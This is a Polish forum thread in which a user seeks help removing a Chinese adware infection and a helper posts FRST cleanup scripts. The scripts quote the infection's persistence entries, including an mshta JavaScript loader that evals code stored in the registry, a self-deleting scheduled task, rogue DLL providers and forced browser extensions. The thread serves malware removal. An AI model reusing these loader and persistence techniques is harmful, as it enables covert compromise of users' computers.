Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Chiński wirus, którego nie mogę usunąć.

Pattyk 08 Cze 2017 17:38 657 4
  • #1 08 Cze 2017 17:38
    Pattyk
    Poziom 2  

    Witam wszystkich. Ściągnąłem program i widząc, że jest coś nie tak chciałem wyjść z niego ale już było za późno i cały komputer został zainfekowany chińskim wirusem. Zaczęły się instalować niechciane programy . Przeczyściłem komputer programem adwcleaner. Po uruchomieniu komputera po restarcie pojawił mi się komunikat coś o personalizowaniu i jakieś chińskie znaki i mój docelowy pulpit. Nie wiem czy już wszystko zostało wykasowane czy nie. W załączniku przesyłam logi z frst.

    0 4
  • #2 08 Cze 2017 21:05
    Kolobos
    Spec od komputerów

    Zrob kopie zakladek z Chrome, skrypt usunie katalog profilu przegladarki utworzony przez infekcje.
    Usun tez dane synchronizacji Chrome z konta google:
    https://support.google.com/chrome/answer/6386691?hl=pl

    Uruchom system w trybie awaryjnym i tam wykonaj podany Fixlist.txt dla FRST z zawartoscia:
    CloseProcesses:
    Task: {44C5C34D-A56B-4273-B989-7A2784BF48C9} - System32\Tasks\psv_Dom-Sing => cmd.exe /c regedit.exe /s "C:\ProgramData\Plusdax\Temptom.reg" &amp; del "C:\ProgramData\Plusdax\Temptom.reg" &amp; SCHTASKS /Delete /TN "psv_Dom-Sing" /F <==== UWAGA
    Task: {5B0E9472-771A-4D94-AE47-93B4800ABF17} - System32\Tasks\Contacts Toolbox => Rundll32.exe "C:\Program Files\Contacts Toolbox\Contacts Toolbox.dll",hAGoKJIGjakN
    Task: {5DA658A9-B4A2-42F4-BD37-87BFBD563C51} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-03-07] (UCWeb Inc) <==== UWAGA
    Task: {E75DE8EC-8884-4561-BF5F-D9435BDC09F4} - System32\Tasks\SessionAgent => C:\windows\gdp32.exe [2017-03-05] ()
    Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA
    ShortcutWithArgument: C:\Users\Patryk\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Patryk\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
    ShortcutWithArgument: C:\Users\Patryk\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Patryk\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
    ShortcutWithArgument: C:\Users\Patryk\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Patryk\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"
    AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
    AlternateDataStreams: C:\Windows\system32\drivers:x64 [1498914]
    AlternateDataStreams: C:\Windows\system32\drivers:x86 [1223458]
    HKU\.DEFAULT\Software\Classes\8090: "C:\Windows\system32\mshta.exe" "javascript:GNW6hd2r="fR";JV6=new ActiveXObject("WScript.Shell");x1dXsa6w="DZGndep";yWJP7=JV6.RegRead("HKCU\\software\\ixaxs\\pxyjzqrupx");di2Ey="4";eval(yWJP7);W52ogSM="snIn1k";" <===== UWAGA




    HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\Patryk\AppData\Local\Temp\DeleteOnReboot.bat [1776 2017-06-08] () <===== UWAGA
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\Run: [UQmedia] => C:\Users\Patryk\AppData\Local\UQmedia\rdgdv.exe [163651 2017-03-06] (ReactOS Foundation)
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\Run: [Ilsoft] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Patryk\AppData\Local\UQmedia\uspHelpSnap.dll <===== UWAGA
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C5].txt [10810 2017-06-08] ()
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\MountPoints2: E - E:\autorun.exe
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\MountPoints2: {31fd71b4-557e-11e6-ab3d-c2a98a4682d0} - G:\AutoRun.exe
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\MountPoints2: {31fd71c2-557e-11e6-ab3d-c2a98a4682d0} - E:\AutoRun.exe
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\MountPoints2: {31fd7207-557e-11e6-ab3d-c2a98a4682d0} - E:\AutoRun.exe
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\MountPoints2: {445efdd6-5f95-11e6-a85a-bcee7bc7da35} - E:\setup.exe
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\MountPoints2: {b7476a8d-547b-11e6-8a2a-c2a98a4682d0} - E:\autorun.exe
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\...\MountPoints2: {fae957be-2ff5-11e6-bb1f-bcee7bc7da35} - E:\HiSuiteDownLoader.exe
    HKLM\...\Providers\5qrjwf1w: F:\Program Files\MSUser.Default\Help_3_\local64spl.dll <===== UWAGA
    HKLM\...\Providers\a8jynd9e: F:\Program Files\MSUser.Default\Help_6\\local64spl.dll <===== UWAGA
    HKLM\...\Providers\anp8oc9j: F:\Program Files\MSUser.Default\Help_6_\local64spl.dll <===== UWAGA
    HKLM\...\Providers\barha230: C:\\local64spl.dll <===== UWAGA
    HKLM\...\Providers\mukzqa36: F:\Program Files\MSUser.Default\Help_5_\local64spl.dll <===== UWAGA
    HKLM\...\Providers\n9x6yc5u: F:\Program Files\MSUser.Default\Help_5\\local64spl.dll <===== UWAGA
    HKLM\...\Providers\ndkv6iiy: F:\Program Files\MSUser.Default\Help_4\\local64spl.dll <===== UWAGA
    HKLM\...\Providers\q3np5vj0: C:\_\local64spl.dll <===== UWAGA
    HKLM\...\Providers\tu5hnbg3: F:\Program Files\MSUser.Default\Help_4_\local64spl.dll <===== UWAGA
    HKLM\...\Providers\x12jtvnl: F:\Program Files\MSUser.Default\Help_3\\local64spl.dll <===== UWAGA
    ShellExecuteHooks: Brak nazwy - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\ProgramData\igfxDH.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files (x86)\Maoha\JiSuZip\JZipExt.dll [2016-12-27] (深圳市猫哈网络科技发展有限公司)
    HKU\S-1-5-21-2328868302-2970645825-1387881798-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...9C4V4BonnmCkmf9pCscVOoLAx9_b1Eo3dDVg,,&q={searchTerms}
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    CHR DefaultProfile: ChromeDefaultData
    CHR HomePage: ChromeDefaultData -> hxxp://www.google.pl/
    CHR StartupUrls: ChromeDefaultData -> "hxxp://google.pl/"
    CHR Profile: C:\Users\Patryk\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-06-08] <==== UWAGA
    CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx
    S2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [599440 2017-03-07] () <==== UWAGA
    S2 JszipService; C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe [X]
    S1 cryptfd; C:\Windows\System32\drivers\cryptfd.sys [195496 2017-05-25] ()
    S1 WiserIso; C:\Windows\System32\Drivers\vcdrom.sys [25432 2016-12-27] ()
    U0 aswVmm; Brak ImagePath
    S3 digitalpower; system32\drivers\digitalpower.sys [X]
    S1 JszipProtect; \??\C:\Program Files (x86)\Maoha\JiSuZip\JsZipProtect64.sys [X]
    S1 p1481382841am; \??\C:\Users\Patryk\AppData\Local\Temp\bk3B3C.tmp\p1481382841am.sys [X] <==== UWAGA
    U2 WinSnare; Brak ImagePath
    2017-06-08 16:02 - 2017-06-08 16:03 - 00000458 _____ C:\Windows\Tasks\UCBrowserUpdater.job
    2017-06-08 16:02 - 2017-06-08 16:02 - 00003434 _____ C:\Windows\System32\Tasks\UCBrowserUpdater
    2017-06-08 16:01 - 2017-06-08 16:24 - 00016728 _____ C:\Windows\System32\Tasks\Contacts Toolbox
    2017-06-08 16:01 - 2017-06-08 16:02 - 00000000 ____D C:\Program Files (x86)\UCBrowser
    2017-06-08 16:01 - 2017-06-08 16:01 - 00000000 ____D C:\Users\Patryk\AppData\Local\UCBrowser
    2017-06-08 16:00 - 2017-06-08 16:19 - 00000000 ____D C:\Program Files (x86)\Maoha
    2017-06-08 16:00 - 2017-06-08 16:00 - 00000000 ____D C:\Users\Patryk\AppData\Local\jiobodfkmdffkcajblpbomgodflafoph
    2017-06-08 16:00 - 2017-06-08 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\极速压缩
    2017-06-08 16:00 - 2016-12-27 04:34 - 00025432 _____ C:\Windows\system32\Drivers\vcdrom.sys
    2017-06-08 15:59 - 2017-06-08 15:59 - 00000000 ____D C:\Users\Public\Documents\XMUpdate
    2017-06-08 15:59 - 2017-06-08 15:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk
    2017-05-28 14:46 - 2017-05-28 14:46 - 05562976 _____ (Piriform Ltd) C:\Users\Patryk\Downloads\rcsetup153.exe
    2017-05-28 13:48 - 2017-05-28 13:48 - 00000000 ____D C:\Users\Patryk\AppData\Local\FonePaw
    2017-05-25 03:43 - 2017-05-25 03:43 - 00195496 _____ C:\Windows\system32\Drivers\cryptfd.sys
    2017-06-08 16:23 - 2017-02-18 17:50 - 00000000 ____D C:\AdwCleaner
    EmptyTemp:

    Po zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/

    Na koniec zamiesc nowe logi z FRST, ze skanowania.


    @killerxxl jak masz pisac takie porady, to lepiej sobie w ogole daruj.

    0
  • #4 10 Cze 2017 12:36
    Kolobos
    Spec od komputerów

    W Chrome nadal masz zainfekowany profil utworzony przez infekcje, usunales dane synchronizacji z konta google?

    Wykonaj Fixlist.txt dla FRST:
    CHR DefaultProfile: ChromeDefaultData
    CHR Profile: C:\Users\Patryk\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-06-10] <==== UWAGA
    C:\Users\Patryk\AppData\Local\Google\Chrome\User Data\ChromeDefaultData
    2017-06-08 16:00 - 2017-06-08 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\极速压缩


    Usun katalog C:\FRST i to wszystko.

    0
  • #5 10 Cze 2017 15:27
    Pattyk
    Poziom 2  

    Zrobiłem wszystko jak to było wytłumaczone wcześniej.

    0